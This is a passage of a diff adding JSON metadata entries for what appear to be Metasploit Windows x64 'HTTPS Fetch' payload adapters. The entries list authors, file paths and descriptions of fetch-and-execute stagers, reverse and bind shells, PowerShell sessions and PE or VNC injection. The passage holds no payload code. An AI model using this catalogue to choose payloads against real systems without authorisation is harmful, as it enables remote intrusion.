"adapter_refname": "cmd/windows/https/x64", + "adapted_refname": 
"windows/x64/peinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/https/x64/peinject/reverse_tcp_uuid": { + "name": "HTTPS Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/https/x64/peinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/peinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/https/x64/pingback_reverse_tcp": { + "name": "HTTPS Fetch, Windows x64 Pingback, Reverse TCP Inline", + "fullname": "payload/cmd/windows/https/x64/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and report UUID (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + 
"autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/https/x64/powershell_bind_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/windows/https/x64/powershell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/powershell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/powershell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/https/x64/powershell_reverse_tcp": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/windows/https/x64/powershell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": 
"Fetch and execute an x64 payload from an HTTPS server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/powershell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/powershell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/https/x64/powershell_reverse_tcp_ssl": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/windows/https/x64/powershell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/powershell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/powershell_reverse_tcp_ssl", + "staged": false + }, + "payload_cmd/windows/https/x64/shell/bind_ipv6_tcp": { + "name": "HTTPS 
Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/https/x64/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/https/x64/shell/bind_ipv6_tcp_uuid": { + "name": "HTTPS Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/https/x64/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": 
"/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/https/x64/shell/bind_named_pipe": { + "name": "HTTPS Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/https/x64/shell/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/https/x64/shell/bind_tcp": { + "name": "HTTPS Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/https/x64/shell/bind_tcp", + 
"aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/https/x64/shell/bind_tcp_rc4": { + "name": "HTTPS Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/https/x64/shell/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + 
"notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/https/x64/shell/bind_tcp_uuid": { + "name": "HTTPS Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/https/x64/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/https/x64/shell/reverse_tcp": { + "name": "HTTPS Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/https/x64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped 
command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/https/x64/shell/reverse_tcp_rc4": { + "name": "HTTPS Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/https/x64/shell/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp_rc4", + 
"staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/https/x64/shell/reverse_tcp_uuid": { + "name": "HTTPS Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/https/x64/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/https/x64/shell_bind_tcp": { + "name": "HTTPS Fetch, Windows x64 Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/windows/https/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": 
null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/https/x64/shell_reverse_tcp": { + "name": "HTTPS Fetch, Windows x64 Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/windows/https/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/https/x64/vncinject/bind_ipv6_tcp": { + "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/https/x64/vncinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 
connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/https/x64/vncinject/bind_ipv6_tcp_uuid": { + "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/https/x64/vncinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + 
"needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/https/x64/vncinject/bind_named_pipe": { + "name": "HTTPS Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/https/x64/vncinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/https/x64/vncinject/bind_tcp": { + "name": "HTTPS Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/https/x64/vncinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a 
connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/https/x64/vncinject/bind_tcp_rc4": { + "name": "HTTPS Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/https/x64/vncinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + 
"payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/https/x64/vncinject/bind_tcp_uuid": { + "name": "HTTPS Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/https/x64/vncinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/https/x64/vncinject/reverse_http": { + "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel 
communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/reverse_http", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/https/x64/vncinject/reverse_https": { + "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + 
"needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/reverse_https", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/https/x64/vncinject/reverse_tcp": { + "name": "HTTPS Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/https/x64/vncinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/https/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/https/x64/vncinject/reverse_tcp_rc4": { + "name": "HTTPS Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/https/x64/vncinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 
